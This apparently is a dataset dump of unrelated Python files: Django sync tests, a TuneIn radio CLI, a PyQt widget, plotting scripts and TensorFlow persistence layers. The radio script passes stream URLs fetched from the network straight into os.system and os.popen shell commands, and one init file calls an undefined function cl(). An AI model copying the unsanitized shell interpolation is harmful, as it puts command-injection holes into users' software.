serialized=json.dumps(log.serialize()),
)
# make sure delete propagates to store due to deleted foreign key
self.mc.deserialize_from_store()
# have to serialize to update deleted models
self.mc.serialize_into_store()
self.assertFalse(SummaryLog.objects.filter(id=log.id).exists())
self.assertTrue(Store.objects.get(id=log.id).deleted)
def test_hard_deleted_model_propagates_to_store_record(self):
"""
It could be the case that we have two store records, one that is hard deleted and the other that has a fk pointing to the hard deleted record.
When we deserialize, we want to ensure that the record with the fk pointer also gets the hard deleted flag set, while also not
deserializing the data into a model.
"""
# user will be deleted
user = MyUser(username="user")
user.save(update_dirty_bit_to=False)
# log may be synced in from other device
log = SummaryLog(user_id=user.id)
log.id = log.calculate_uuid()
StoreModelFacilityFactory(
model_name="user",
id=user.id,
serialized=json.dumps(user.serialize()),
deleted=True,
hard_deleted=True,
)
StoreModelFacilityFactory(
model_name="contentsummarylog",
id=log.id,
serialized=json.dumps(log.serialize()),
)
# make sure delete propagates to store due to deleted foreign key
self.mc.deserialize_from_store()
# have to serialize to update deleted models
self.mc.serialize_into_store()
self.assertFalse(SummaryLog.objects.filter(id=log.id).exists())
self.assertTrue(Store.objects.get(id=log.id).hard_deleted)
def _create_two_users_to_deserialize(self):
user = MyUser(username="test", password="password")
user2 = MyUser(username="test2", password="password")
user.save()
user2.save()
self.mc.serialize_into_store()
user.username = "changed"
user2.username = "changed2"
Store.objects.filter(id=user.id).update(serialized=json.dumps(user.serialize()), dirty_bit=True)
Store.objects.filter(id=user2.id).update(serialized=json.dumps(user2.serialize()), dirty_bit=True)
return user, user2
def test_regular_model_deserialization(self):
# deserialization should be able to handle multiple records
user, user2 = self._create_two_users_to_deserialize()
self.mc.deserialize_from_store()
self.assertFalse(MyUser.objects.filter(username="test").exists())
self.assertFalse(MyUser.objects.filter(username="test2").exists())
self.assertTrue(MyUser.objects.filter(username="changed").exists())
self.assertTrue(MyUser.objects.filter(username="changed2").exists())
def test_filtered_deserialization(self):
# filtered deserialization only impacts specific records
user, user2 = self._create_two_users_to_deserialize()
self.mc.deserialize_from_store(filter=Filter(user._morango_partition))
self.assertFalse(MyUser.objects.filter(username="test").exists())
self.assertTrue(MyUser.objects.filter(username="test2").exists())
self.assertTrue(MyUser.objects.filter(username="changed").exists())
self.assertFalse(MyUser.objects.filter(username="changed2").exists())
class SelfReferentialFKDeserializationTestCase(TestCase):
def setUp(self):
(self.current_id, _) = InstanceIDModel.get_or_create_current_instance()
self.mc = MorangoProfileController("facilitydata")
def test_self_ref_fk(self):
self.assertEqual(_self_referential_fk(Facility), "parent_id")
self.assertEqual(_self_referential_fk(MyUser), None)
def test_delete_model_in_store_deletes_models_in_app(self):
root = FacilityModelFactory()
child1 = FacilityModelFactory(parent=root)
child2 = FacilityModelFactory(parent=root)
self.mc.serialize_into_store()
# simulate a node being deleted and synced
Store.objects.filter(id=child2.id).update(deleted=True)
Store.objects.update(dirty_bit=True)
grandchild1 = FacilityModelFactory(parent=child2)
grandchild2 = FacilityModelFactory(parent=child2)
self.mc.deserialize_from_store()
# ensure tree structure in app layer is correct
child1 = Facility.objects.filter(id=child1.id)
self.assertTrue(child1.exists())
self.assertEqual(child1[0].parent_id, root.id)
self.assertFalse(Facility.objects.filter(id=child2.id).exists())
self.assertFalse(Facility.objects.filter(id=grandchild1.id).exists())
self.assertFalse(Facility.objects.filter(id=grandchild2.id).exists())
def test_models_created_successfully(self):
root = FacilityModelFactory()
child1 = FacilityModelFactory(parent=root)
child2 = FacilityModelFactory(parent=root)
self.mc.serialize_into_store()
Facility.objects.all().delete()
DeletedModels.objects.all().delete()
Store.objects.update(dirty_bit=True, deleted=False)
self.mc.deserialize_from_store()
# ensure tree structure in app layer is correct
self.assertTrue(Facility.objects.filter(id=root.id).exists())
child1 = Facility.objects.filter(id=child1.id)
self.assertTrue(child1.exists())
self.assertEqual(child1[0].parent_id, root.id)
child2 = Facility.objects.filter(id=child2.id)
self.assertTrue(child2.exists())
self.assertEqual(child2[0].parent_id, root.id)
def test_deserialization_of_model_with_missing_parent(self):
self._test_deserialization_of_model_with_missing_parent(correct_self_ref_fk=True)
def test_deserialization_of_model_with_mismatched_self_ref_fk(self):
self._test_deserialization_of_model_with_missing_parent(correct_self_ref_fk=False)
def _test_deserialization_of_model_with_missing_parent(self, correct_self_ref_fk):
root = FacilityModelFactory()
child1 = FacilityModelFactory(parent=root)
self.mc.serialize_into_store()
new_child = Store.objects.get(id=child1.id)
data = json.loads(new_child.serialized)
new_child.id = data["id"] = "a" * 32
data["parent_id"] = "b" * 32
if correct_self_ref_fk:
new_child._self_ref_fk = data["parent_id"]
new_child.serialized = json.dumps(data)
new_child.dirty_bit = True
new_child.save()
self.mc.deserialize_from_store()
new_child.refresh_from_db()
self.assertTrue(new_child.dirty_bit)
self.assertIn("exist", new_child.deserialization_error)
def test_deserialization_of_model_with_missing_foreignkey_referent(self):
user = MyUser.objects.create(username="penguin")
log = SummaryLog.objects.create(user=user)
self.mc.serialize_into_store()
new_log = Store.objects.get(id=log.id)
data = json.loads(new_log.serialized)
new_log.id = data["id"] = "f" * 32
data["user_id"] = "e" * 32
new_log.serialized = json.dumps(data)
new_log.dirty_bit = True
new_log.save()
self.mc.deserialize_from_store()
new_log.refresh_from_db()
self.assertTrue(new_log.dirty_bit)
self.assertIn("exist", new_log.deserialization_error)
|
nilq/baby-python
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os,sys
import inquirer
import untangle
import requests
import platform
from colors import *
#If you want to use the program using an alias
#uncomment the following line and write your correct path
#os.chdir("/home/user/test/tunein-cli/")
type={}
station={}
headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:74.0) Gecko/20100101 Firefox/74.0' }
source="http://opml.radiotime.com/Browse.ashx"
ERASE_LINE = '\x1b[1J'
ERASE_ALL = '\x1b[g'
GO_HOME = '\x1b[H'
SCROLL = '\x1b[1000M'
sys.stdout.write(ERASE_LINE)
sys.stdout.write(GO_HOME)
erase="clear && printf '\e[3J'"
if "Windows" in platform.system():
erase="cls"
#check mplayer
try:
std=os.popen("mplayer").read()
if len(std) == 0:
raise
except:
print underline('\nmplayer is not installed\nPlease install mplayer first.')
exit()
def get(url,s):
page = requests.get(url)
xml=page.content
if s=="true":
obj = untangle.parse(xml)
return obj
else:
return xml
def scrape(url,keyword):
if url=="":
url=source
os.system(erase)
out=['<<back']
dup_out=['<<back']
type={}
station={}
obj=get(url,"true")
if keyword!="":
stream=get(url,"true")
if dir(stream.opml.body.outline).count("outline")>2:
for i in obj.opml.body.outline.outline:
type[i["text"]]=i["URL"]
else:
if isinstance(keyword, int)==True:
target=keyword
else:
for i in stream.opml.body.outline:
if i['key'] == keyword:
target=stream.opml.body.outline.index(i)
for i in obj.opml.body.outline[target].outline:
type[i["text"]]=i["URL"]
else:
for i in obj.opml.body.outline:
type[i["text"]]=i["URL"]
a=1
for i in type.keys():
if i.strip() == "More Stations":
st1="[%s] " %(a)
st2=green(i)
out.insert(1,"%s%s" %(st1,st2))
dup_out.insert(1,"%s%s" %(st1,st2))
elif i.strip() == "Find by Name":
st1="[%s] " %(a)
st2=red(i)
out.insert(2,"%s%s" %(st1,st2))
dup_out.insert(2,"%s%s" %(st1,st2))
else:
st1="[%s] " %(a)
st2=u''.join(i).encode("utf-8")
out.append("%s%s" %(st1,bold(st2)))
dup_out.append("%s%s" %(st1,st2))
a+=1
ask=[inquirer.List('opt',message="Choose:",choices=out)]
ans=inquirer.prompt(ask)['opt']
if ans == "<<back":
main()
else:
choice=int(dup_out[out.index(ans)].split()[0][1:-1])
choice-=1
st_url=type[type.keys()[choice]]
if st_url != None and "Tune.ashx?id" in st_url:
st_title=type.keys()[choice]
newurl=get(st_url,"false")
if len(newurl.split())>1:
newurl=newurl.split()[0]
playlist(newurl,st_title)
if st_url==None:
tt=dup_out[out.index(ans)].split()
tt.remove(dup_out[out.index(ans)].split()[0])
for i in obj.opml.body.outline:
if i["text"]==" ".join(tt):
key=i["key"]
if key==None:
key=choice
#print "SCRAPE:",url,key
scrape(url,key)
scrape(st_url,"")
def playlist(url,title):
global run
print "\nTitle:",bold(u''.join(title).encode("utf-8"))
print "STREAM:",bold(url)
if ".pls" in url:
print "pls file found"
url=os.popen("python getter.py '%s false'" %(url.strip())).read()[6:]
print "FOUND:",url
if run=="true":
print "Opening stream..."
print "To stop streaming press enter:"
os.system("mplayer -really-quiet %s" %(url))
print ""
kill=raw_input("exit:")
os.system("pkill -9 mplayer")
main()
elif run == "false":
try:
title.encode('ascii')
new_title=title
if new_title.startswith(".")==True:
new_title=new_title[1:]
except UnicodeEncodeError:
new_title="".join(x for x in title if x.isalnum())
if new_title.startswith(".")==True:
new_title=new_title[1:]
new_title=new_title.encode('utf8')
#title="playlist"
file=open("%s.pls" %(new_title),"w")
file.write("[playlist]")
file.write("\nFile1=%s" %(url.strip()))
file.write("\nTitle1=%s" %(r''.join(new_title)))
file.write("\nLength1=-1")
file.write("\nNumberOfEntries=1")
file.write("\nVersion=2")
file.close()
print bold("Location: "+os.path.abspath("%s.pls" %(new_title)))
print "done."
exit()
elif run == "info":
exit()
elif run == "browser":
print "Opening stream in browser..."
if "Linux" in platform.system():
os.popen("xdg-open %s" %(url))
elif "Darwin" in platform.system():
os.popen("open %s" %(url))
elif "Windows" in platform.system():
os.popen("start %s" %(url))
main()
elif run == "fav":
fav=open("fav_st.txt","a+")
fav.write("%s %s" %(u''.join(title).encode("utf-8"),url))
fav.close()
print "added.\npress enter to continue:", raw_input()
main()
#START from HERE
def main():
global run
run="false"
os.system(erase)
ask1=[inquirer.List('opt',message="Select Option:",choices=[
'[1]'+bold(': Open Stream'),
'[2]'+bold(': Download Stream'),
'[3]'+bold(': Show Stream Source'),
'[4]'+bold(': Open In Browser'),
'[5]'+bold(': Add to Favourites'),
'[6]'+bold(': Add custom station'),
'[7]'+bold(': Favourites'),
'[8]'+bold(': Exit')])]
ans1=inquirer.prompt(ask1)['opt']
if ans1[1:2] == "1":
run="true"
elif ans1[1:2] == "2":
run="false"
elif ans1[1:2] == "3":
run="info"
elif ans1[1:2] == "4":
run="browser"
elif ans1[1:2] == "5":
run="fav"
elif ans1[1:2] == "6":
c_name=raw_input(bold("Name:"))
c_url=raw_input(bold("Address:"))
fav=open("fav_st.txt","a+")
fav.write("%s %s" %(u''.join(c_name).encode("utf-8"),c_url))
fav.close()
print "added.\npress enter to continue:", raw_input()
main()
elif ans1[1:2] == "7":
favlist={}
dupfavlist=["<<back"]
dup2favlist=["<<back"]
fav=open("fav_st.txt","r").read().splitlines()
for item in fav:
if len(item)!=0:
favlist[" ".join(item.split()[0:-1])]=item.split()[-1]
dupfavlist.append(" ".join(item.split()[0:-1]))
dup2favlist.append(bold(" ".join(item.split()[0:-1])))
os.system(erase)
ask2=[inquirer.List('opt',message="Choose:",choices=dup2favlist)]
ans2=inquirer.prompt(ask2)['opt']
if ans2 == "<<back":
main()
run="true"
playlist(favlist[dupfavlist[dup2favlist.index(ans2)]],ans2.decode("utf-8"))
elif ans1[1:2] == "8":
print bold("Bye.")
exit()
scrape("","")
main()
|
nilq/baby-python
|
python
|
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
# Allows to drag parent widget when holding pushbutton
# To use it you need to set screen_geometry in your QWidget first
class DragButton(QPushButton):
def __init__(self, parent: QWidget, constant_x0: bool):
super(DragButton, self).__init__()
self.parent = parent
self.__mousePressPos = None
self.__mouseMovePos = None
self.constantX0 = constant_x0 # left edge of screen
self.posY = 0
def mousePressEvent(self, event: QMouseEvent) -> None:
if event.button() == Qt.LeftButton:
self.__mousePressPos = event.globalPos()
self.__mouseMovePos = event.globalPos()
super(DragButton, self).mousePressEvent(event)
def mouseMoveEvent(self, event: QMouseEvent) -> None:
if event.buttons() == Qt.LeftButton:
# adjust offset from clicked point to origin of widget
curr_pos = self.parent.mapToGlobal(self.parent.pos())
global_pos = event.globalPos()
diff = global_pos - self.__mouseMovePos
new_pos = self.parent.mapFromGlobal(curr_pos + diff)
if self.constantX0:
new_pos.setX(0)
if new_pos.y() < 0:
new_pos.setY(0)
if new_pos.y() > self.parent.screen_geometry.bottom() - self.parent.height():
new_pos.setY(self.parent.screen_geometry.bottom() - self.parent.height())
self.parent.move(new_pos)
self.__mouseMovePos = global_pos
super(DragButton, self).mouseMoveEvent(event)
def mouseReleaseEvent(self, event: QMouseEvent) -> None:
if self.__mousePressPos is not None:
moved = event.globalPos() - self.__mousePressPos
if moved.manhattanLength() > 3:
event.ignore()
# print("Menu Y: %d" % self.parent.mapToGlobal(self.parent.pos()).y())
self.posY = self.parent.mapToGlobal(self.parent.pos()).y()
elif hasattr(self.parent, "show_hide_buttons"):
# Since this class is used in MainWidget AND NetWidget need to check which one is calling
# and hide parents buttons only if it has method for that.
# Cannot use isinstance() because importing MainWidget would cause circular import.
show_hide_buttons = getattr(self.parent, "show_hide_buttons")
if hasattr(show_hide_buttons, "__call__"):
show_hide_buttons()
if hasattr(self.parent, "update_pos_size"):
update_pos_size = getattr(self.parent, "update_pos_size")
if hasattr(update_pos_size, "__call__"):
update_pos_size()
else:
super(DragButton, self).mouseReleaseEvent(event)
|
nilq/baby-python
|
python
|
from csv import reader
from . import Destination
from . import DestinationPro
from . import ProtocolPort
def read_prot_port_info(info):
prot_info = {"HTTP": ["1", "1", "1"], "HTTPS": ["1", "0", "1"]}
with open(info, "r") as f:
csv_reader = reader(f)
next(csv_reader)
for row in csv_reader:
prot_port = row[0].upper()
well_known = row[1]
human_readable = row[2]
imp = row[4]
prot_info[prot_port] = [well_known, human_readable, imp]
return prot_info
#constructs DestinationPros from an output CSV
#useful for generating plots without having to rerun analyses
def load(script_dir, out_csv_path):
print("Loading results from %s..." % out_csv_path)
prot_enc_dict = {"encrypted": "1", "unencrypted": "0", "unknown": "-1"}
prots_info = read_prot_port_info(script_dir + "/protocol_analysis/protocols_info.csv")
dst_pro = []
with open(out_csv_path, "r") as f:
csv_reader = reader(f)
next(csv_reader)
for row in csv_reader:
ip = row[0]
host = row[1]
host_full = row[2]
bytes_snd = row[3]
bytes_rcv = row[4]
pckt_snd = row[5]
pckt_rcv = row[6]
country = row[7]
party = row[8]
org = row[9]
prot_port = row[10]
enc = row[11]
dst = Destination.Destination(ip, host, party, host_full, country, org)
try:
prot_info = prots_info[prot_port.upper()]
prot = ProtocolPort.ProtocolPort(prot_port, prot_enc_dict[enc.lower()],
prot_info[0], prot_info[1], prot_info[2])
except KeyError:
prot = ProtocolPort.ProtocolPort(prot_port, '-1', '-1', '-1', '-1')
dp = DestinationPro.DestinationPro(dst, prot)
dp.add_all(int(bytes_snd), int(bytes_rcv), int(pckt_snd), int(pckt_rcv))
dst_pro.append(dp)
return dst_pro
|
nilq/baby-python
|
python
|
# 執行時自行註解掉不需要的段落
# 自動型別
var = 'Hello World' # string
print(var)
var = 100 # int
print(var+10)
print('-----')
# 沒有 overflow
var = 17**3000 # 17的3000次方
print(var)
print('-----')
# swap
a=1
b=2
c=3
print(a,b,c)
c,a,b=b,c,a
print(a,b,c)
print('-----')
# string index
var1 = 'Hello World'
var2 = "Python Programming"
print(var1[0]) # H, 從0開始
print(var2[1:5]) # "ytho", 1到小於5
print('-----')
|
nilq/baby-python
|
python
|
import os, sys, inspect
# use this if you want to include modules from a subforder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import simulation_parameters
import numpy as np
import pylab
import MergeSpikefiles
from FigureCreator import plot_params
import matplotlib.cm as cm
import json
def plot_raster(params, fn, ax, pn, title='', color='k', alpha=1.):
print 'Loading Spikes from:', params['%s_spikes_merged_fn_base' % cell_type]
if (os.path.exists(fn) == False):
Merger = MergeSpikefiles.MergeSpikefiles(params)
Merger.merge_spiketimes_files(params['%s_spiketimes_fn_base' % (cell_type)], params['%s_spiketimes_merged_fn_base' % (cell_type)], pn)
print 'Loading ', fn
data = np.loadtxt(fn)
assert (data.size > 0), 'ERROR file %s has 0 size\nIf there was a problem when merging them, delete the empty one and rerun' % (fn)
ax.plot(data[:,0], data[:,1], 'o', markersize=5, markeredgewidth=.0, color=color, alpha=alpha)
ax.set_xlim((0, params['t_sim']))
ax.set_title(title)
ax.set_xlabel('Time [ms]')
# ax.set_ylabel('Cell GID')
ylabels = ax.get_yticklabels()
yticks = ax.get_yticks()
new_ylabels = []
for i_, y in enumerate(yticks[0:]):
# for i_, y in enumerate(yticks[1:]):
new_ylabels.append('%d' % (y - params['%s_offset' % cell_type]))
ax.set_ylim((-1 + params['%s_offset' % cell_type], params['n_%s' % cell_type] + params['%s_offset' % cell_type] + 1))
if len(new_ylabels) > 0:
ax.set_yticklabels(new_ylabels)
xlabels = ax.get_xticklabels()
xticks = ax.get_xticks()
new_xlabels = ['']
for i_, x in enumerate(xticks[1:-1]):
# for i_, x in enumerate(xticks[1:]):
new_xlabels.append('%d' % x)
new_xlabels.append('')
ax.set_xticklabels(new_xlabels)
def get_sniff_amplitude(x, tstart, tstop, T, t_shift, amp):
f_x = 0
if (x > tstart) and (x < tstop):
f_x = (amp * (np.sin(x / (T) - t_shift))**2)
return f_x
def plot_sniff_input(params, ax):
if params['with_sniffing_input']:
tstop = params['t_stop'] = 1200 # [ms]
tstart = params['t_start'] = 200 # [ms]
T = params['sniff_period'] = 80. # [ms]
t_shift = params['t_shift_sniff'] = 40. # [ms]
else:
print 'This was run without sniffing input\nReturn None'
return None
times = np.arange(0, params['t_sim'], 5)
ylim = ax.get_ylim()
alpha_max = .2
c = 'b'
for t in times:
f_x = get_sniff_amplitude(t, tstart, tstop, T, t_shift, 1.0)
# print 'f_x', f_x
ax.plot((t, t), (ylim[0], ylim[1]), lw=4, ls='-', c=c, alpha=f_x * alpha_max)
if __name__ == '__main__':
info_txt = \
"""
Usage:
python plot_pattern_completion_rivalry.py [PATTERN_NUMBER]
"""
# python plot_pattern_completion_rivalry.py [TRAINING_FOLDER] [TEST_FOLDER] [PATTERN_NUMBER_MIN] [PATTERN_NUMBER_MAX]
assert (len(sys.argv) > 1), 'ERROR: pattern number not given\n' + info_txt
pn_max = int(sys.argv[1])
training_folder = 'Cluster_OcOcLearning_nGlom40_nHC12_nMC30_vqOvrlp4_np50_OcOnly/'
plot_folder = 'Cluster_PatternCompletionTestPostLearningWithSniff_fOR0.50_nGlom40_nHC12_nMC30_vqOvrlp4_np50_FullSystem/'
params_fn = os.path.abspath(plot_folder) + '/Parameters/simulation_parameters.json'
param_tool = simulation_parameters.parameter_storage(params_fn=params_fn)
params = param_tool.params
training_params_fn = os.path.abspath(training_folder) + '/Parameters/simulation_parameters.json'
training_param_tool = simulation_parameters.parameter_storage(params_fn=training_params_fn)
training_params = training_param_tool.params
cell_type = 'readout'
# cell_type = 'pyr'
# cell_type = 'mit'
for pn in xrange(pn_max):
training_fn = training_params['%s_spiketimes_merged_fn_base' % cell_type] + str(pn) + '.dat'
test_fn = params['%s_spiketimes_merged_fn_base' % cell_type] + str(pn) + '.dat'
plot_params['figure.subplot.left'] = .11
plot_params['figure.subplot.top'] = .92
plot_params['figure.subplot.right'] = .98
plot_params['xtick.labelsize'] = 24
plot_params['ytick.labelsize'] = 24
plot_params['axes.labelsize'] = 32
plot_params['axes.titlesize'] = 32
pylab.rcParams.update(plot_params)
fig = pylab.figure()
ax = fig.add_subplot(111)
color_0 = '#A6A6A6'
color_1 = 'b'
# title = 'Pattern completion test pattern %d' % (pn)
# title = 'MT spikes'
title = '%s spikes ' % (cell_type.capitalize())
plot_raster(training_params, training_fn, ax, pn, title=title, color=color_0, alpha=0.9)
plot_raster(params, test_fn, ax, pn, title=title, color=color_1, alpha=1.)
# plot_sniff_input(params, ax)
output_fn = params['figure_folder'] + '/' + 'competion_raster_%s_%d.png' % (cell_type, pn)
print 'Saving figure to', output_fn
pylab.savefig(output_fn, dpi=(300))
pylab.show()
|
nilq/baby-python
|
python
|
# %%
# ml + loss vs inner steps (Sigmoid best val)
import numpy as np
import matplotlib.pyplot as plt
from pylab import MaxNLocator
from pathlib import Path
print('running')
save_plot = True
# save_plot = False
# - data for distance
inner_steps_for_dist = [1, 2, 4, 8, 16, 32]
meta_test_cca = [0.2801, 0.2866, 0.2850, 0.2848, 0.2826, 0.2914]
meta_test_cca_std = [0.0351, 0.0336, 0.0322, 0.0341, 0.0321, 0.0390]
# - data for meta-lost
inner_steps_for_loss = [0, 1, 2, 4, 8, 16, 32]
loss_maml0 = 43.43485323588053
meta_test_loss = [loss_maml0, 10.404328906536103, 4.988216777642568, 5.07447034517924, 5.449032692114512, 5.36303452650706, 4.339294484257698]
# - create plot
fig, axs = plt.subplots(2, 1, sharex=True, tight_layout=True)
axs[0].errorbar(inner_steps_for_dist, meta_test_cca, yerr=meta_test_cca_std, marker='x', label='dCCA')
# axs[0].errorbar(inner_steps_for_dist, meta_test_ned, yerr=meta_test_ned_std, marker='x', label='NED')
axs[0].axhline(y=0.12, color='r', linestyle='--', label='dCCA previous work [15]')
axs[0].legend()
axs[0].set_title('Representation difference vs adaption\'s inner steps ')
axs[0].set_ylabel('Represenation change')
# axs[0].set_ylim([0, 1])
axs[1].plot(inner_steps_for_loss, meta_test_loss, marker='x', label='loss', color='g')
axs[1].set_title('Meta-Validation loss vs adaptation\'s inner steps')
axs[1].set_xlabel('adaptation\'s inner steps')
axs[1].set_ylabel('Loss')
# axs[1].axhline(y=loss_maml0, color='g', linestyle='--', label='not adaptated')
axs[1].get_xaxis().set_major_locator(MaxNLocator(integer=True))
axs[1].legend()
plt.tight_layout()
if save_plot:
root = Path('~/Desktop').expanduser()
plt.savefig(root / 'ml_loss_vs_inner_steps_sigmoid_best.png')
plt.savefig(root / 'ml_loss_vs_inner_steps_sigmoid_best.svg')
plt.savefig(root / 'ml_loss_vs_inner_steps_sigmoid_best.pdf')
plt.show()
#%%
# ml + loss vs inner steps (ReLU best net)
import numpy as np
import matplotlib.pyplot as plt
from pylab import MaxNLocator
from pathlib import Path
print('running')
save_plot = True
# save_plot = False
# - data for distance
inner_steps_for_dist = [1, 2, 4, 8, 16, 32]
meta_test_cca = [0.2876, 0.2962, 0.2897, 0.3086, 0.2951, 0.3024]
meta_test_cca_std = [0.0585, 0.0649, 0.0575, 0.0625, 0.0565, 0.0620]
# - data for meta-loss
inner_steps_for_loss = [0, 1, 2, 4, 8, 16, 32]
loss_maml0 = 19.27044554154078
# loss_maml0_std = 1.019144981585053
meta_test_loss = [loss_maml0,
5.545517734686533, 7.434794012705485, 6.754467636346817, 6.577781716982524, 3.731084116299947, 6.21407161851724]
# plt.title("Meta-test vs Depth of ResNet")
fig, axs = plt.subplots(2, 1, sharex=True, tight_layout=True)
axs[0].errorbar(inner_steps_for_dist, meta_test_cca, yerr=meta_test_cca_std, marker='x', label='dCCA')
axs[0].axhline(y=0.12, color='r', linestyle='--', label='dCCA previous work [15]')
axs[0].legend()
axs[0].set_title('Representation difference vs adaption\'s inner steps ')
axs[0].set_ylabel('Represenation change')
# axs[0].set_ylim([0, 1])
axs[1].plot(inner_steps_for_loss, meta_test_loss, marker='x', label='loss', color='g')
axs[1].set_title('Meta-Validation loss vs adaptation\'s inner steps')
axs[1].set_xlabel('adaptation\'s inner steps')
axs[1].set_ylabel('Loss')
# axs[1].axhline(y=loss_maml0, color='g', linestyle='--', label='not adaptated')
axs[1].get_xaxis().set_major_locator(MaxNLocator(integer=True))
axs[1].legend()
plt.tight_layout()
if save_plot:
root = Path('~/Desktop').expanduser()
plt.savefig(root / 'ml_loss_vs_inner_steps_relu_best.png')
plt.savefig(root / 'ml_loss_vs_inner_steps_relu_best.svg')
plt.savefig(root / 'ml_loss_vs_inner_steps_relu_best.pdf')
plt.show()
print('done')
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Password generator to generate a password based on the specified pattern.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2018 - 2019 by rgb-24bit.
:license: MIT, see LICENSE for more details.
"""
from .__version__ import __version__, __description__
from .__version__ import __author__, __author_email__
from .__version__ import __license__, __copyright__
from rgpg.core import cli
if __name__ == '__main__':
cl()
|
nilq/baby-python
|
python
|
"""Module :mod:`perslay.archi` implement the persistence layer."""
# Authors: Mathieu Carriere <mathieu.carriere3@gmail.com>
# License: MIT
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
# Post-processing operation with combination of batch normalization, dropout and relu
def _post_processing(vector, pro, dropout_value=.9):
for c in pro:
if c == "b":
vector = tf.layers.batch_normalization(vector)
if c == "d":
vector = tf.nn.dropout(vector, dropout_value)
if c == "r":
vector = tf.nn.relu(vector)
return vector
# Vectorization implementing DeepSet architecture
def permutation_equivariant_layer(inp, dimension, perm_op, L_init, G_init, bias_init, L_const, G_const, bias_const, train_vect):
""" DeepSet PersLay """
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
lbda = tf.get_variable("L", shape=[dimension_before, dimension], initializer=L_init, trainable=train_vect) if not L_const else tf.get_variable("L", initializer=L_init)
b = tf.get_variable("b", shape=[1, 1, dimension], initializer=bias_init, trainable=train_vect) if not bias_const else tf.get_variable("b", initializer=bias_init)
A = tf.reshape(tf.einsum("ijk,kl->ijl", inp, lbda), [-1, num_pts, dimension])
if perm_op is not None:
if perm_op == "max":
beta = tf.tile(tf.expand_dims(tf.reduce_max(inp, axis=1), 1), [1, num_pts, 1])
elif perm_op == "min":
beta = tf.tile(tf.expand_dims(tf.reduce_min(inp, axis=1), 1), [1, num_pts, 1])
elif perm_op == "sum":
beta = tf.tile(tf.expand_dims(tf.reduce_sum(inp, axis=1), 1), [1, num_pts, 1])
else:
raise Exception("perm_op should be min, max or sum")
gamma = tf.get_variable("G", shape=[dimension_before, dimension], initializer=G_init, trainable=train_vect) if not G_const else tf.get_variable("G", initializer=G_init)
B = tf.reshape(tf.einsum("ijk,kl->ijl", beta, gamma), [-1, num_pts, dimension])
return A - B + b
else:
return A + b
# Vectorizations taken from "Learning Representations of Persistence Barcodes"
def rational_hat_layer(inp, num_elements, q, mean_init, r_init, mean_const, r_const, train_vect):
""" Rational Hat PersLay """
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
mu = tf.get_variable("m", shape=[1, 1, dimension_before, num_elements], initializer=mean_init, trainable=train_vect) if not mean_const else tf.get_variable("m", initializer=mean_init)
r = tf.get_variable("r", shape=[1, 1, 1], initializer=r_init, trainable=train_vect) if not r_const else tf.get_variable("r", initializer=r_init)
bc_inp = tf.expand_dims(inp, -1)
norms = tf.norm(bc_inp - mu, ord=q, axis=2)
return 1/(1 + norms) - 1/(1 + tf.abs(tf.abs(r)-norms))
def rational_layer(inp, num_elements, mean_init, variance_init, alpha_init, mean_const, variance_const, alpha_const, train_vect):
""" Rational PersLay """
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
mu = tf.get_variable("m", shape=[1, 1, dimension_before, num_elements], initializer=mean_init, trainable=train_vect) if not mean_const else tf.get_variable("m", initializer=mean_init)
sg = tf.get_variable("s", shape=[1, 1, dimension_before, num_elements], initializer=variance_init, trainable=train_vect) if not variance_const else tf.get_variable("s", initializer=variance_init)
al = tf.get_variable("a", shape=[1, 1, num_elements], initializer=alpha_init, trainable=train_vect) if not alpha_const else tf.get_variable("a", initializer=alpha_init)
bc_inp = tf.expand_dims(inp, -1)
return 1/tf.pow(1+tf.reduce_sum(tf.multiply(tf.abs(bc_inp - mu), tf.abs(sg)), axis=2), al)
def exponential_layer(inp, num_elements, mean_init, variance_init, mean_const, variance_const, train_vect):
""" Exponential PersLay """
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
mu = tf.get_variable("m", shape=[1, 1, dimension_before, num_elements], initializer=mean_init, trainable=train_vect) if not mean_const else tf.get_variable("m", initializer=mean_init)
sg = tf.get_variable("s", shape=[1, 1, dimension_before, num_elements], initializer=variance_init, trainable=train_vect) if not variance_const else tf.get_variable("s", initializer=variance_init)
bc_inp = tf.expand_dims(inp, -1)
return tf.exp(tf.reduce_sum(-tf.multiply(tf.square(bc_inp - mu), tf.square(sg)), axis=2))
# Vectorizations implementing persistence landscapes
def landscape_layer(inp, num_samples, sample_init, sample_const, train_vect):
""" Landscape PersLay """
sp = tf.get_variable("s", shape=[1, 1, num_samples], initializer=sample_init, trainable=train_vect) if not sample_const else tf.get_variable("s", initializer=sample_init)
return tf.maximum( .5 * (inp[:, :, 1:2] - inp[:, :, 0:1]) - tf.abs(sp - .5 * (inp[:, :, 1:2] + inp[:, :, 0:1])), np.array([0]))
# Vectorizations implementing Betti curves
def betti_layer(inp, theta, num_samples, sample_init, sample_const, train_vect):
""" Betti PersLay """
sp = tf.get_variable("s", shape=[1, 1, num_samples], initializer=sample_init, trainable=train_vect) if not sample_const else tf.get_variable("s", initializer=sample_init)
X, Y = inp[:, :, 0:1], inp[:, :, 1:2]
return 1. / ( 1. + tf.exp( -theta * (.5*(Y-X) - tf.abs(sp - .5*(Y+X))) ) )
# Vectorizations implementing persistence entropy
def entropy_layer(inp, theta, num_samples, sample_init, sample_const, train_vect):
""" Entropy PersLay
WARNING: this function assumes that padding values are zero
"""
bp_inp = tf.einsum("ijk,kl->ijl", inp, tf.constant(np.array([[1.,-1.],[0.,1.]], dtype=np.float32)))
sp = tf.get_variable("s", shape=[1, 1, num_samples], initializer=sample_init, trainable=train_vect) if not sample_const else tf.get_variable("s", initializer=sample_init)
L, X, Y = bp_inp[:, :, 1:2], bp_inp[:, :, 0:1], bp_inp[:, :, 0:1] + bp_inp[:, :, 1:2]
